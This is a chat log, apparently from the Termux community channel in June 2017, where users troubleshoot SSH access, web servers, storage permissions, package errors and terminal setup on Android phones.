2017-06-21 09:53:05 gitter (TheCryptek) frumpylava: That’s what I thought, so I came here to ask for help ._. Perhaps port 8022 isn’t forwarded for my phone [software wise]
2017-06-21 09:53:21 frumpylava @TheCryptek can you connect via USB?
2017-06-21 09:53:24 frumpylava https://glow.li/technology/2016/09/20/access-termux-via-usb.html
2017-06-21 09:54:35 gitter (TheCryptek) frumpylava: Give me just a sec to grab my cord
2017-06-21 09:56:40 gitter (TheCryptek) frumpylava: It worked, now I just have to figure out how to authorize my key from my laptop ._.
2017-06-21 09:58:24 gitter (TheCryptek) How do I do that owo
2017-06-21 10:01:11 frumpylava @TheCryptek you can copy it to your sdcard with your laptop and then in termux grab it from there and add it tho ~/.ssh/authorized_keys.
2017-06-21 10:12:15 gitter (TheCryptek) I got it :D Thank you frumpylava <3
2017-06-21 10:21:37 gitter (TheCryptek) After running httpd, where are the public html files located?
2017-06-21 10:24:10 frumpylava @TheCryptek if you didn’t specify anything, your current working dir.
2017-06-21 10:24:44 frumpylava also, termux has much better webservers now. Apache2, lighttpd and nginx are all available.
2017-06-21 10:25:49 frumpylava nginx is probably the easiest to setup. It comes with pretty good defaults.
2017-06-21 10:27:07 gitter (TheCryptek) frumpylava: I have nginx, couldn’t find its public html
2017-06-21 10:28:21 gitter (TheCryptek) and I can’t get nginx to work either can’t seem to bind port 8080
2017-06-21 10:28:45 frumpylava Default seems to be /data/data/com.termux/files/usr/share/nginx/html
2017-06-21 10:29:00 frumpylava also you probably had httpd running when trying to start nginx
2017-06-21 10:29:07 frumpylava kill that first.
2017-06-21 10:29:47 gitter (TheCryptek) frumpylava: I did it still didn’t work
2017-06-21 10:31:26 frumpylava @TheCryptek run “netstat -tulpn” and figure out what is running on 8080
2017-06-21 10:31:58 gitter (TheCryptek) frumpylava: Claims nothing
2017-06-21 10:33:43 gitter (TheCryptek) frumpylava: this is my error log https://pastebin.com/xiX8aYTN
2017-06-21 10:34:16 frumpylava what. Why is your nginx triying to bind to port 8022?
2017-06-21 10:34:26 frumpylava 8022 is the sshd port
2017-06-21 10:34:36 gitter (TheCryptek) I forgot
2017-06-21 10:34:44 gitter (TheCryptek) that I may or may not have messed with the config
2017-06-21 10:35:08 gitter (TheCryptek) Where is the nginx config xD
2017-06-21 10:35:23 frumpylava @TheCryptek $PREFIX/etc/nginx/nginx.conf
2017-06-21 10:35:53 gitter (TheCryptek) frumpylava: You could just ~/../etc/nginx
2017-06-21 10:35:54 gitter (TheCryptek) lol
2017-06-21 10:37:12 gitter (TheCryptek) Whats the default port for ftp 8021?
2017-06-21 10:37:51 frumpylava yeah
2017-06-21 10:38:04 frumpylava but nginx needs 8080
2017-06-21 10:38:11 gitter (TheCryptek) Alright, I’ve been trying to get nginx running for three days now
2017-06-21 10:39:01 frumpylava but it runs out of the box :P
2017-06-21 10:39:07 gitter (TheCryptek) and ssh running
2017-06-21 10:39:07 gitter (TheCryptek) nginx is now running on 8080 after putting the config back
2017-06-21 10:39:11 gitter (TheCryptek) It wasn’t
2017-06-21 10:39:27 gitter (TheCryptek) I kept getting that error from the link with nginx when I first ran it and ssh I couldnt c onnect with my PC
2017-06-21 10:39:28 gitter (TheCryptek) xD
2017-06-21 10:39:34 gitter (TheCryptek) I mean other then that its all running fine :D
2017-06-21 10:39:57 gitter (TheCryptek) I already rated it 5 stars ont he play store. I plan on buying all the add-ons [including the ones I won’t be using] to support the dev :D
2017-06-21 11:16:30 gitter (vishalbiswas) frumpylava: on a rooted device you switch the cpu governer to performance
2017-06-21 11:18:08 gitter (vishalbiswas) Also, httpd = apache2
2017-06-21 14:24:18 frumpylava @vishalbiswas not necessarily. Busybox also has a httpd
. It’s probable that he meant that one.
2017-06-21 14:24:37 frumpylava also sucks about needing root to unlock my cores.
2017-06-21 15:08:29 u0_a109 hey
2017-06-21 15:10:08 u0_a109 any irssi user? using /nick made my phone reboot the last 2 times i tried
2017-06-21 15:10:10 rod-yolo ho
2017-06-21 15:25:13 frumpylava what is it with irc clients and rebooting peoples phones. weechat frequently reboots my phone as well.
2017-06-21 16:09:45 rods-tab3 maybe your phone is rejecting profanity
2017-06-21 16:10:31 rods-tab3 iirc termux has an app named ‘‘profanity’’ ???
2017-06-21 20:05:13 gitter (enedil) @n1had5_twitter use github issues
2017-06-21 22:59:44 dahora hey guys! love the app. it has been life-changing to access a full-fledged terminal on the go. One thing: what happened to wget in the recent release? there’s a version of the binary that doesnt live in ~/usr/bin but persists and overwrites the version i download from the pkg server. this persistent version only has two (!!!) options. Since im a thirworlder bandwidth is very expensive. i use wget -k to grab websites for offline readi
2017-06-21 22:59:46 dahora …range new bug(?) or change has ruined this ESSENTIAL feature of my workflow. can someone shed some light on what’s going on? thanks!!
2017-06-21 23:00:21 dahora going offline soon. my email: aeromax.way@gmail.com
2017-06-21 23:01:09 dahora …range new bug(?) or change has ruined this ESSENTIAL feature of my workflow. can someone shed some light on what’s going on? thanks!!
2017-06-21 23:03:51 dahora one more detail: upon running the cmd im getting a version echo from busybox
2017-06-22 00:25:31 gitter (vishalbiswas) dahora: install wget to get the full wget, busybox wget is the default one.
2017-06-22 01:01:36 kr1shna termux-setup-storage does not created termux directory on sdcard, is this normal
2017-06-22 01:42:53 rods-tab3 on mine its: /storage/08C5-1EF7/Android/data/com.termux/files
2017-06-22 01:46:09 rods-tab3 aka ~/storage/external
2017-06-22 04:04:29 u0_a152 hello?
2017-06-22 04:05:23 anonymEcho hi ?
2017-06-22 04:05:28 anonymEcho hey bro?
2017-06-22 04:06:53 anonymEcho c’mon anybody online?
2017-06-22 04:36:21 specialkay hey
2017-06-22 05:57:47 frumpylava ITT: People who think 100 of people are constantly watching this channel.
2017-06-22 05:58:01 frumpylava Ask your questions and wait. Don’t ask to ask.
2017-06-22 07:24:38 specialkay is it possible to launch a specific app from termux? like piping youtube-dl to mpv-android?
2017-06-22 07:29:22 frumpylava specialkay: Well, you can do xdg-open to open a file
2017-06-22 07:40:07 specialkay yes but it’s a bit frustrating, for example when launching a .mp4 with xdg-open mpv-android is not on the list
2017-06-22 07:40:31 specialkay for some reasons
2017-06-22 07:46:13 Transfusion works for me: https://i.imgur.com/eSxDMVT.png , maybe your version of mpv-android didn’t register the correct intent-filter to handle implicit intents?
2017-06-22 09:13:52 Crukx Hello
2017-06-22 09:14:09 Crukx Anyone install ionic through termux?
2017-06-22 09:14:30 Crukx I installed node and it worked fine
2017-06-22 09:14:39 Crukx Even express and nedb
2017-06-22 09:14:57 Crukx But ionic or angular don’t get installed
2017-06-22 09:30:56 Crukx Anyone?
2017-06-23 01:21:13 Regenaxer fornwall: A logcat after such a crash after “Copy” is at https://software-lab.de/logcat20jun17 - Does it give anything useful?
2017-06-23 05:01:55 frumpylava Does anybody know of a good spam filter that works with getmail on termux?
2017-06-23 09:14:32 m4sk1n hi, I know that I would need to compile everything by my own, but can I change Linux environment in Termux to arch-based one?
2017-06-23 09:21:43 AppAraat hello, I am new to Termux and was wondering if it was possible to have root privs in Termux if phone is rooted too.
2017-06-23 10:07:35 gitter (enedil) AppAraat: yes it is
2017-06-23 10:07:38 gitter (enedil) just type su
2017-06-23 10:09:45 BrainDamage m4sk1n: you can chroot ( proot actually ) to an arch environment, with limited functionality
2017-06-23 10:13:16 AppAraat gitter: (enedil) thanks!
2017-06-23 11:23:03 specialkay hey
2017-06-23 11:28:56 specialkay is it possible to display a video with mpv (the one in the repos), and displaying the output on the screen? not with libcaca, i mean a regular video output
2017-06-23 11:28:59 specialkay ?
2017-06-23 11:47:50 gitter (pvagner) I am trying to build speech-dispatcher for termux. I have just found out it needs sys/sem.h . I don’t know more details about this but it appears as this is not possible to overcome easily. am I right?
2017-06-23 13:58:51 gitter (pvagner) Also how about #include
2017-06-23 14:13:22 anonymo hi
2017-06-23 14:13:56 anonymo when I try to run command pkg install openssh
2017-06-23 14:14:03 anonymo it returns an error
2017-06-23 14:14:11 anonymo can anyone help plz
2017-06-23 14:14:40 gitter (enedil) anonymo: show the exact error
2017-06-23 14:14:43 gitter (enedil) plz
2017-06-23 14:15:11 anonymo http://termux.net stable/main arm Packages
2017-06-23 14:15:11 anonymo Hash Sum mismatch
2017-06-23 14:15:11 anonymo Fetched 54.3 kB in 1s (28.0 kB/s)
2017-06-23 14:15:11 anonymo Reading package lists… Done
2017-06-23 14:15:11 anonymo E: Failed to fetch http://termux.net/dists/stable/main/binary-arm/Packages.xz Hash Sum mismatch
2017-06-23 14:15:11 anonymo E: Some index files failed to download. They have been ignored, or old ones used instead.
2017-06-23 14:15:47 gitter (enedil) @pvagner there is <phthread.h>
2017-06-23 14:15:57 gitter (pvagner) @anonymo do you have network connectivity on the device?
2017-06-23 14:16:18 gitter (enedil) and asm/sembuf.h
, (if you meant this)
2017-06-23 14:16:41 anonymo yes i have network connection..
2017-06-23 14:16:49 anonymo but can be a little slow..
2017-06-23 14:16:55 anonymo not sure abt the speed
2017-06-23 14:17:41 gitter (pvagner) @and asm/sembuf.h
, (if you meant this) yes I have found out NDK has pthread.h . however It appears not to be included with some reason…
2017-06-23 14:18:41 gitter (pvagner) @and asm/sembuf.h
, (if you meant this) as for the sys/sem.h I have just tried to reove this, speech-dispatcher can also run on solaris and it’s not available there either, so perhaps I’ll find a way…
2017-06-23 14:18:47 gitter (enedil) Hmm, I just ran find $HOME/../usr -name "*thread*.h"
on my Termux terminal. Are talking about compiling on device, or cross-compiling?
2017-06-23 14:19:24 gitter (pvagner) @Hmm, I just ran find $HOME/../usr -name "*thread*.h"
on my Termux terminal. Are talking about compiling on device, or cross-compiling? I’m crosscompiling
2017-06-23 14:19:41 anonymo sure
2017-06-23 14:20:00 gitter (enedil) @pvagner Then I probably won’t help :c
2017-06-23 14:25:38 anonymo plz find me a solution if you can
2017-06-23 14:25:56 anonymo its really very urgent for me to connect to my machine
2017-06-23 14:26:06 anonymo will be very grateful
2017-06-23 20:41:02 anonymo there is an issue in the termux app..
2017-06-23 20:41:23 anonymo it is not able to install any package
2017-06-23 21:43:06 gitter (vishalbiswas) anonymo: its a server error
2017-06-23 21:43:35 gitter (vishalbiswas) @fornwall You need to purge cloudflare cache once more
2017-06-23 22:30:08 gitter (vishalbiswas) @fornwall was TERMUX_NDK_REVISION
incremented with the last ndk update?
2017-06-23 22:48:44 gitter (vishalbiswas) can somebody explain to me what this does http://hg.openjdk.java.net/mobile/dev/hotspot/file/a81769cc0015/src/os_cpu/linux_aarch64/vm/threadLS_linux_aarch64.s
2017-06-24 09:15:34 kr1shna there is no termux directory on my sdcard, i have installed tasker, is there any guide about how to configure and ue
2017-06-24 09:15:44 kr1shna ..use
2017-06-24 10:13:28 sdrausty kr1shna: search termux setup storage site:github.com
2017-06-24 10:47:35 kr1shna termux setup storage
2017-06-24 10:58:14 gitter (vishalbiswas) @mklein994 what do you mean?
2017-06-24 11:00:32 gitter (mklein994) Oh wait, nevermind. 😳 I just realized that it’s already at 1.18.0. Thanks for the hard work!
2017-06-24 11:01:34 gitter (mklein994) @mklein994 doesn’t know how he missed that…
2017-06-24 11:02:25 gitter (vishalbiswas) @mklein994 probably because it was updated within couple of hours of release
2017-06-24 11:07:17 gitter (mklein994) (I have your fork added as a remote)
2017-06-24 11:07:26 gitter (vishalbiswas) @mklein994 does installing rust via rustup works?
2017-06-24 11:08:07 gitter (vishalbiswas) If it does, there’s no need for the pull request then
2017-06-24 11:08:43 gitter (mklein994) I haven’t tried that yet, but that would be neat. I have a feeling that it won’t though, because of /system/bin/linker
.
2017-06-24 11:08:47 gitter (mklein994) Right?
2017-06-24 11:09:33 gitter (vishalbiswas) @mklein994 rustup has added android binaries support
2017-06-24 11:34:23 specialkay hey
2017-06-24 11:58:03 rods-tab3 https://termux.com/storage.html /storage/08C5-1EF7/Android/data/com.termux/files
2017-06-24 12:01:53 specialkay any tips for a short version of ‘ls -l’ on small screens?
2017-06-24 12:02:16 specialkay you can make the font smaller ofc T_T
2017-06-24 12:02:48 specialkay something like ls -g | cut -d” “ -f5- | column etc |
2017-06-24 12:03:15 specialkay but it doesnt look good, identation are ghettoish and not so readable
2017-06-24 12:04:17 gitter (enedil) ls -gG
might help a bit
2017-06-24 12:04:26 specialkay G is not working on termux
2017-06-24 12:04:52 gitter (enedil) then install GNU ls
2017-06-24 12:05:10 specialkay how do you do it?
2017-06-24 12:05:29 gitter (enedil) hmm, search for coreutils
2017-06-24 12:06:35 specialkay thanks installing
2017-06-24 12:06:45 specialkay will it “overwrite” the previous ls?
2017-06-24 12:08:23 gitter (enedil) Rather shadow
2017-06-24 12:08:41 gitter (enedil) previous ls will be in different directory I guess
2017-06-24 12:09:30 specialkay wooo it work, G is back
2017-06-24 12:09:47 specialkay thanks! will investigate if there are more options to shorten the output :D
2017-06-24 12:10:10 enedil specialkay: it’s funny that people come from GNU/Linux to some other Unix
2017-06-24 12:10:24 enedil Ant they pretend they know how to use command line xD
2017-06-24 12:11:04 enedil I’ve been using BSD tools (inside OS X) for about a year so such differences no longer make me anxious
2017-06-24 12:14:56 specialkay yeah
2017-06-24 12:37:49 rods-tab3 thats the beauty of *nix; each 669 versions has different options so you can pick and choose
2017-06-24 12:40:00 rods-tab3 and you can be sure that your version is incompatible with everyone elses
2017-06-24 12:59:02 rods-tab3 Rob Pike said it best http://herpolhode.com/rob/ugly.pdf
2017-06-24 14:21:23 anonymo can anyone plz tell how to login to my server by using a public key in termux
2017-06-24 14:22:44 anonymo @gitter
2017-06-24 14:24:13 anonymo ~gitter
2017-06-24 14:29:49 shiroyasha anonymo: Generate a key pair locally, copy the content of $HOME/.ssh/id_rsa.pub
, login to your server, and paste to the end of $HOME/.ssh/authorized_keys
.
2017-06-24 14:31:09 gitter (pvagner) You either have to transfer your private key to the ~/.ssh folder within termux. Or you have to generate new key pair on termux and transfer the public key to server you wish to login to. The key has to be added into ~/.ssh/authorized_keys file.
2017-06-24 14:34:42 anonymo kkz
2017-06-24 14:36:01 anonymo and what if I have multiple files in .ssh folder
2017-06-24 14:36:15 anonymo how shall I point to one file for a particular aerver
2017-06-24 14:40:26 shiroyasha The $HOME/.ssh/config
file allows you to set specific keys per host.
2017-06-24 14:40:42 shiroyasha man ssh_config
2017-06-24 14:43:12 anonymo pwd
2017-06-24 14:52:09 anonymo how exit for tail command
2017-06-24 14:54:27 rods-tab3 q
2017-06-24 14:56:47 anonymo wechat??
2017-06-25 00:38:36 specialkay sup
2017-06-25 00:41:20 specialkay what’s the fastest way to cleanly exit termux? something killing all the process, i edited my tmux config, and i noticed some settings i edited wasn’t there when i relaunched it the next time, is it possible i lost data (written) when killing termux with the android app manager?
2017-06-25 00:42:47 rods-tab3 i just type: exit
2017-06-25 00:43:29 specialkay yes but this exit a single shell, if you user termux and have tons of stuff running you’ll have to do it a lot
2017-06-25 00:43:43 specialkay if you use*
2017-06-25 06:32:52 gitter (noncom) is there a way to run scipy on termux?
2017-06-25 07:17:43 specialkay still me
2017-06-25 07:17:45 specialkay :]
2017-06-25 07:20:58 specialkay is it possible to bind the windows key to ctrl+b? at the moment, it launch the google assistant
2017-06-25 07:21:37 specialkay for tmux i mean :) woops
2017-06-25 07:21:46 specialkay and also the terminal i guess
2017-06-25 12:26:43 gitter (enedil) Hmm, I had no trouble using ctrl+b in tmux
2017-06-25 14:05:00 gitter (fornwall) @vishalbiswas theTERMUX_NDK_VERSION
was updated to 15. There is also the revision part in TERMUX_STANDALONE_TOOLCHAIN+="-v17"
, but that only needs to be bumped when updating the toolchain setup within a single ndk version
2017-06-25 17:10:13 aleph- Hey, trying to use espeak. What’s our default audio device to use?
2017-06-25 18:18:33 BlackAngel2 hello
2017-06-25 18:18:40 BlackAngel2 Can I install the boinc program on the termux?
2017-06-25 18:20:50 BlackAngel2 and ekg polish instant messenger
2017-06-25 18:21:19 BlackAngel2 please help me :)
2017-06-25 18:21:42 m4sk1n jaki ekg? :o
2017-06-25 19:19:34 BlackAngel2 ekg to komunikator gg na konsole
2017-06-26 02:50:47 frumpylava Meh, I was hoping the –kill-on-exit option in proot would greatly simplify running proot as a service, but unfortunately proot doesn’t relay or follow term signals, so it just sits there aftrer exiting.
2017-06-26 05:44:15 kutsan Hey all, how can I execute a binary inside Termux bin folder from outside with /system/bin/sh shell? I was making a widget with KWGT Kustom and their shell function only allow to run /system/bin/sh. When I give full Termux node or python path, it says not found. Is it possible to achieve this without root access. Because python and node bins already chmod’ed.
2017-06-26 06:00:26 frumpylava kustan. I don’t know about KFGT, but I am almost certain that it would also allow shortcuts to be executed. With Termux:Widget Addon you can create shortcuts (in addition to the Widgets) of your files. So you could execute Termux binaries via the shell scripts instead (both in foreground and background possible)
2017-06-26 06:13:29 kutsan frumpylava: Thanks for answer but this is not what I want. No doubt, KWGT have a option to run shortcuts but it’s only for action events like when touching the widget. Basically, they have a function called sh()
and it accepts an string argument, runs it with /system/bin/sh and returns the output, so I can use that string inside a text component like making clock. Problem is, sh(‘/data/data/com.termux/files/usr/bin/node
2017-06-26 06:13:29 kutsan –version’) returns not found. Is this because I am not root?
2017-06-26 06:14:05 kutsan Problem is, sh(‘/data/data/com.termux/files/usr/bin/node’) returns not found.
2017-06-26 06:27:29 live_the_dream yes not root
2017-06-26 06:28:04 live_the_dream each app in android uses a differejt username
2017-06-26 06:40:31 kutsan live_the_dream: Thanks then!
2017-06-26 07:07:49 frumpylava something is not alright with the latest mariadb version. I keep getting “Got an error reading communication packets”
2017-06-26 08:14:54 BrainDamage is it possible to remove the exit confirmation after a terminal is closed?
2017-06-26 08:21:23 frumpylava BrainDamage: No. https://github.com/termux/termux-app/issues/56
2017-06-26 08:31:53 frumpylava grr it’s php that segfaults when connecting to mariadb.
2017-06-26 08:33:16 BrainDamage bleh, looks like it’s being a bit overly protective imo
2017-06-26 08:33:38 BrainDamage if one does want to shoot itself in the food, one should be able to remove the safety
2017-06-26 08:33:57 frumpylava I agree.
2017-06-26 09:34:43 frumpylava By the way. I will be conducting a Lecture/Workshop on Termux and how to use it as your main OS during this years ZeTeCo (zeteco.ch). It’s a hacker camp in northern Switzerland.
2017-06-26 09:39:33 gitter (vishalbiswas) #DATWEBSITE
2017-06-26 09:44:05 frumpylava @cocodevienne aren’t you from Austria? You should come too.
2017-06-26 09:44:37 BrainDamage I think I should get my eyes checked for cancer
2017-06-26 09:46:46 specialkay hey
2017-06-26 09:47:52 specialkay any idea to what i should set #!/usr/bin/env python to?
2017-06-26 09:48:03 specialkay or replace*
2017-06-26 09:48:07 frumpylava BrainDamage: haha, I agree. The website is also pointless, since all info is in the wiki http://wiki.zeteco.ch/
2017-06-26 09:48:30 frumpylava specialkay: You can run “termux-fix-shebang filename” to automatically fix any given shebang.
2017-06-26 09:48:45 specialkay thanks! trying that
2017-06-26 09:50:10 specialkay it works, it’s beautiful °_°’
2017-06-26 10:22:41 AndrewMcSwain_ why is git push remote origin giving me an ssh error? termux used to be my primary dev environment
2017-06-26 10:23:22 AndrewMcSwain_ why can i suddenly not use ssh? is this a permissions error with android 6.0?
2017-06-26 10:24:06 AndrewMcSwain_ it says “cannot run ssh. no file or directory”
2017-06-26 10:25:02 specialkay i’m running android 6 and ssh works
2017-06-26 10:26:36 specialkay is the ssh session to your termux, or from your termux?
2017-06-26 10:32:42 AndrewMcSwain_ i am assuming from. i had configured my remote with git@github.com:…. I changed the syntax to https://github.com/user/repo and it worked.
2017-06-26 10:34:39 BrainDamage can you ssh to another machine?
2017-06-26 11:46:02 frumpylava @vishalbiswas Do you know why php mysqli might segfault when connecting to databases?
2017-06-26 20:54:23 gitter (prinxy) Can I run html in termux… Please?
2017-06-26 20:54:50 gitter (prinxy) HTML file in termux?
2017-06-26 23:15:01 dunderproto Hi all, I’m looking for a way to install some basic command line apps that are missing on stock android
2017-06-26 23:16:01 dunderproto I’d like to have man for reading man pages offline, less, and that’s probably it. Is termux right for me? I don’t need anything too complicated (I don’t want an entire distro on my phone).
2017-06-26 23:49:18 rods-tab3 termux has everything - basic install is about ~~ 38MB
2017-06-26 23:50:50 dunderproto interesting, thanks
2017-06-26 23:59:54 rods-tab3 that maybe wrong – my data/com.termux is 48MB of which 25MB is man files
2017-06-27 00:01:29 rods-tab3 the basic man install is 950kB – but to get man pages for an app - you need to install the app
2017-06-27 00:47:54 dunderproto rods-tab3: thanks. OK, maybe termux is right for me.
2017-06-27 00:48:22 dunderproto I was considering either t-ui or termux
2017-06-27 00:49:16 rods-tab3 you need android => 5
2017-06-27 00:51:33 dunderproto I’m running android 6.0.1
2017-06-27 01:21:56 poyntz hi. Is there anyway to do root ops on /sdcard on a rooted phone?
2017-06-27 01:22:10 poyntz …through termux
2017-06-27 01:23:43 poyntz tried making a folder and symlinking in that directory using su and got nowhere
2017-06-27 02:11:12 frumpylava qebn
2017-06-27 02:25:53 rods-tab3 how much space does /data/apps/com.termux take up ?
2017-06-27 05:40:56 gitter (arpecop) I am wondering why termux got less permissions for modifying directories than adb for example
2017-06-27 05:41:42 gitter (arpecop) also can I “pkill” processes ?
2017-06-27 06:32:19 phil42 u0_a84@localhost ~> which pkill
2017-06-27 06:32:34 phil42 data/data/com.termux/files/usr/bin/pkill
2017-06-27 06:54:00 dexofan23 hi
2017-06-27 06:55:06 dexofan23 exit
2017-06-27 11:50:51 rods-tab3 how much space does /data/apps/com.termux use ?
2017-06-27 12:27:28 freeemint Hello has anybody got Julia running on #termux
2017-06-28 05:59:49 gitter (noncom) and looking at the https://github.com/its-pointless/gcc_termux repo
2017-06-28 06:00:34 gitter (noncom) but I can’t find any definite instructions on how to install this (although I’ve added the gpg key and the sources to the $PREFIX/etc/apt/sources.list file)
2017-06-28 06:00:44 gitter (noncom) and also, how to install SciPy after that
2017-06-28 06:00:52 gitter (noncom) is there an instruction on this somewhere?
2017-06-28 06:08:11 delt Hello everyone, new user here :D very happy with this app!
2017-06-28 06:20:16 delt just wondering, how can i copy stuff from /sdcard as the default termux user?
2017-06-28 06:20:38 delt also, i made my very nice programming font, which i would like to use in termux. is that possible?
2017-06-28 06:25:49 grepper delt: $HOME/.termux/font.ttf afaik
2017-06-28 06:25:58 delt grepper: thanks
2017-06-28 06:26:23 delt grepper: though i tried that, and it says permission denied even if i change user/perms on the file :/
2017-06-28 06:26:52 delt same with a .bash_profile i tried to copy to ~/
2017-06-28 06:27:44 delt even if i set permissions to 777, it wasn’t able to read the files
2017-06-28 06:27:47 grepper with the .bash_profile you could do “cat /path/to/.bash_profile > ~/.bash_profile
2017-06-28 06:27:53 grepper “
2017-06-28 06:28:08 delt yeah, if the termux user was able to read it :/
2017-06-28 06:28:14 grepper oh
2017-06-28 06:28:16 grepper strange
2017-06-28 06:28:27 grepper do you have root?
2017-06-28 06:28:29 delt yeah
2017-06-28 06:28:47 grepper you could do the same thing as root, after creating the empty file in termux
2017-06-28 06:28:50 delt lineageos 14.1, samsung galaxy s3 (d2att)
2017-06-28 06:29:03 grepper ah, my last phone
2017-06-28 06:29:10 delt very nice machine =)
2017-06-28 06:29:18 grepper aye
2017-06-28 06:29:45 delt dates from 2012, and with lineage i can run android 7.1.2 on it, almost as smooth as the stock 4.x that came with it
2017-06-28 06:30:13 grepper yeah, we were lucky with that phone, the devs kept on going and going
2017-06-28 06:30:54 grepper I did run nougat for a little while before it died
2017-06-28 06:31:03 grepper well, the mic died
2017-06-28 06:31:13 delt lineage / cm?
2017-06-28 06:31:48 grepper I think it might have been still cm at that point
2017-06-28 06:32:09 grepper are you trying to copy these files from external sd ?
2017-06-28 06:32:26 delt internal
2017-06-28 06:32:34 grepper hm, stranger and stranger
2017-06-28 06:32:34 delt the ttf
2017-06-28 06:32:45 delt the .bash_profile from /
2017-06-28 06:32:58 grepper though you could try the same trick with cat’ing with the ttf I guess
2017-06-28 06:33:43 grepper does temporarily setting to permissive do anything?
2017-06-28 06:34:34 delt permissive?
2017-06-28 06:35:36 delt yess :D worked if i created an empty font.ttf and then cat my real one » it :) :)
2017-06-28 06:36:27 grepper cool
2017-06-28 06:38:28 delt with setenforce 0 i’m able to read / and i can cd to /sdcard but can’t read (ls) /sdcard
2017-06-28 06:50:26 grepper delt: did you do termux-setup-storage ?
2017-06-28 06:50:53 delt nope, what does that do?
2017-06-28 06:51:21 * delt tries
2017-06-28 06:52:00 delt ah, requests access to storage :D
2017-06-28 06:52:34 delt thanks, working perfectly now!
2017-06-28 07:00:09 grepper yeah, should have thought of that first but only a few hours sleep last night :(
2017-06-28 07:01:58 delt hehe :) anyway thanks very much kind sir!
2017-06-28 07:22:55 delt grepper: i have a symlink /storage/sdcard1 that points to my external sdcard. in termux i can’t even see the symlink
2017-06-28 07:23:56 delt been using linux for 20 years, but android permission shenanigans are weird!!
2017-06-28 08:02:38 IronFire how do i stop termux from force closing when running processes longer than 15 minutes? (like a bot or downloader script)
2017-06-28 08:16:48 delt another small question, is it possible to skip the “process has terminated” prompt if the process terminates successfully?
2017-06-28 08:18:44 BrainDamage delt: https://github.com/termux/termux-app/issues/56
2017-06-28 08:19:52 delt BrainDamage: thanks
2017-06-28 08:20:22 BrainDamage the short answer is no
2017-06-28 08:24:13 delt …as of yet.
2017-06-28 08:24:27 delt thanks for the info
2017-06-28 10:33:23 gitter (noncom) I am getting a huge error message that it can’t work out something about llvm
2017-06-28 17:22:17 swift110 hey
2017-06-28 17:48:28 delt hello
2017-06-28 17:48:38 delt channel’s been dead since this morning
2017-06-28 17:52:57 phil42 but termux is still cool
2017-06-28 18:00:02 swift110 hey delt
2017-06-28 18:00:03 swift110 hey phil42
2017-06-28 18:01:20 phil42 hi
2017-06-28 19:48:56 swift110 how are you phil42
2017-06-28 21:32:55 grepper is there any way to get termux to start up in the foreground when started automatically on boot? I have a tasker profile that accomplishes the start up but termux loads with no sessions.
2017-06-28 23:08:42 brand0n so im new to linux and termux in general.. i know how to install packages but i cant figure out how to install a downloaded program i.e. BitchX
2017-06-28 23:11:02 brand0n hello?
2017-06-28 23:12:13 brand0n im in the correct directory ive used ‘tar’ to extract it but i dont know how to install/run it
2017-06-28 23:28:26 rods-tab3 make
2017-06-29 06:19:10 gitter (xornion) hi
2017-06-29 06:20:14 gitter (xornion) help regarding metasploit install
2017-06-29 06:20:55 gitter (xornion) netifaces error
2017-06-29 06:21:09 gitter (xornion) need a fix
2017-06-29 06:22:31 gitter (xornion) @brunobell help regarding metasploit install
2017-06-29 06:23:08 gitter (xornion) @brunobell netifaces error
2017-06-29 06:23:32 gitter (xornion) @brunobell need a fix
2017-06-29 06:31:12 gitter (xornion) @Neo-Oli tried it with netifaces error
2017-06-29 09:24:38 frumpylava Does imagemagick segfault for anyone else when trying to convert an image?
2017-06-29 13:01:09 delt what’s the best way to access the termux environment from adb?
2017-06-29 14:04:34 thomax hi, i will use termux with an bt keyboard and like to know the best way to get the
2017-06-29 14:04:56 thomax and what do the doc mean with back-key ?
2017-06-29 14:05:09 thomax ^do^does
2017-06-29 14:07:28 gitter (Grimler91) Converting to/from pdf requires ghostscript (which isn’t working yet), trying to convert a pdf currently segfaults
2017-06-29 14:50:47 Grimler_ quit
2017-06-29 14:51:28 Grimler_ ops, trying to learn this irc program..
2017-06-29 15:10:27 * thomax sighs
2017-06-29 17:03:00 delt why is there a 3-4 second delay when running termux-* commands? with any kind of complex script it gets really annoying :/
2017-06-29 17:07:06 rods-tab3 they are shell scripts
2017-06-29 17:09:05 delt oh, i see they run /data/data/com.termux/files/usr/libexec/termux-api
2017-06-29 17:09:27 delt which has the delay
2017-06-29 17:12:34 delt wait, that runs ‘am’ which causes also a delay
2017-06-29 17:28:23 delt termux-camera-photo doesn’t work, it just hangs there forever
2017-06-29 17:32:25 rods-tab3 $ termux-camera-photo -help
2017-06-29 17:32:25 rods-tab3 Usage: termux-camera-photo [-c camera-id] output-file
2017-06-29 17:32:25 rods-tab3 Take a photo and save it to a file in JPEG format.
2017-06-29 17:32:25 rods-tab3 -c camera-id ID of the camera to use (see termux-camera-info), default: 0
2017-06-29 17:33:22 delt yep, read that
2017-06-29 17:33:37 delt tried both front facing (1) and back facing (0)
2017-06-29 17:34:43 delt creates the jpeg file i specified but zero length
2017-06-29 17:35:04 delt and then keeps waiting forever
2017-06-29 17:39:42 rods-tab3 works here: termux-camera-photo -c 1 me.jpg
2017-06-29 17:43:18 delt yep, works from the termux command line
2017-06-29 18:01:07 rods-tab3 how else would you envoke it ?
2017-06-30 06:05:11 u0_a134 hi, has anybody been able to find a pianobar package that works on termux? thanks in advance
2017-06-30 06:06:46 u0_a134 pianobar is a cli based pandora music player client included in most repositories, except that I couldn’t find it in the termux repos
2017-06-30 07:54:03 thomax i solved my bt-keyboard -
2017-06-30 11:59:19 delt rods-tab3: i set my LD_LIBRARY_PATH to /data/data/com.termux/files/usr/lib (and added the bin dir to my PATH) so i could run the commands from adb, but a library was conflicting, i added /system/lib at the beginning of my LD_LIBRARY_PATH and everything works great now :D
2017-06-30 12:07:40 rods-tab3 good
2017-06-30 12:14:15 rods-tab3 i also have a /system/lib64 on android 6
2017-06-30 12:19:12 delt rods-tab3: my phone has 32bit cpu, but good to know thanks :)
2017-06-30 12:19:44 delt android 7.1.2 here (lineageos 14.1) and runs great on a galaxy s3
2017-06-30 12:38:43 rods-tab3 so termux runs ok on android 7 ?
2017-06-30 15:36:42 gitter (prinxy) Am trying to install Conda using pip… But it’s giving me errors
2017-06-30 16:02:19 gitter (prinxy) Am trying to install Anaconda through termux but not working…
2017-06-30 16:07:01 BrainDamage termux has no graphical interface, only consol
2017-06-30 16:07:48 BrainDamage also, iirc anaconda bundles things like numpy and scipy, which are non trivial to get to work
2017-06-30 17:09:05 gitter (prinxy) That means it cant work
2017-06-30 17:21:32 rods-tab3 never say ‘cant’ - you could write your own GUI – i know, lets call it Windows !
2017-06-30 18:04:54 fornwall termux-packages have just switched over to building with unified headers by default
